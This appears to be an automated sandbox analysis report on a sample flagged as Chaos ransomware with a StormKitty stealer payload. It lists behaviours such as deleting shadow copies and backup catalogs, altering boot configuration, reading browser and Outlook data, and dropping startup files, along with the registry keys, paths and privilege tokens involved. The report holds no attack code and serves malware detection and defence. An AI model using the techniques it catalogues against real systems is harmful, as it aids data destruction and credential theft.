Malware Analysis Report

2025-04-13 21:20

Sample ID 250322-dcb4fazp15
Target ZGZ3X_nig.exe
SHA256 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
Tags
chaos stormkitty collection defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

Threat Level: Known bad

The file ZGZ3X_nig.exe was found to be: Known bad.

Malicious Activity Summary

chaos stormkitty collection defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer upx

Chaos

Chaos family

StormKitty

Stormkitty family

StormKitty payload

Chaos Ransomware

Modifies boot configuration data using bcdedit

Deletes shadow copies

Deletes backup catalog

Disables Task Manager via registry modification

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Drops startup file

Command and Scripting Interpreter: PowerShell

Drops desktop.ini file(s)

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Command and Scripting Interpreter: PowerShell

Sets desktop wallpaper using registry

UPX packed file

Hide Artifacts: Ignore Process Interrupts

Browser Information Discovery

Program crash

Unsigned PE

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Checks processor information in registry

outlook_win_path

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious behavior: AddClipboardFormatListener

Interacts with shadow copies

outlook_office_path

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-22 02:51

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-22 02:51

Reported

2025-03-22 02:53

Platform

win10v2004-20250314-en

Max time kernel

103s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

Signatures

Chaos

ransomware chaos

Chaos Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Chaos family

chaos

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\uiilixdbi.jpg" C:\Users\Admin\AppData\Roaming\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4024 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 4024 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 1620 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1620 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2816 wrote to memory of 2796 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
